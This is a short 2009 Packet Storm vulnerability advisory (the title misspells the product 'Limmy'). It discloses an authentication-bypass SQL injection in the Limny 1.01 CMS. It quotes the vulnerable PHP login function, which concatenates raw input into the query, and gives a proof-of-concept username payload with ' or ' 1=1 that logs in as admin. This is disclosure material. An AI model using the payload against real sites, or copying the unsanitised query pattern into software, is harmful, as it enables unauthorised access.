Limmy 1.01 SQL Injection

2009-07-28T00:00:00
ID PACKETSTORM:79697
Type packetstorm
Reporter SirGod
Modified 2009-07-28T00:00:00

Description

                                        
                                            `###########################################################################################  
[+] Limny 1.01 (Auth Bypass) SQL Injection Vulnerability  
[+] Discovered By SirGod  
[+] http://insecurity-ro.org  
[+] http://h4cky0u.org  
############################################################################################  
  
[+] Script Homepage : http://www.limny-project.com/  
  
[+] SQL Injection Vulnerability  
  
- Notes : magic_quotes_gpc = off  
  
- Vulnerable code in includes/functions.php  
  
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
function CheckLogin($username, $password)  
{  
global $db;  
$query = $db->query("SELECT user, pass FROM ".TABLE_PREFIX."users  
WHERE user='$username' AND pass='$password'");  
if($check = $db->fetch_array($query))  
{  
return true;  
}else{  
return false;  
}  
}  
  
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
- PoC  
  
Username : [REAL-ADMIN-NAME] ' or ' 1=1  
Password : anything  
  
[REAL-ADMIN-NAME] = usually is admin  
  
############################################################################################  
  
`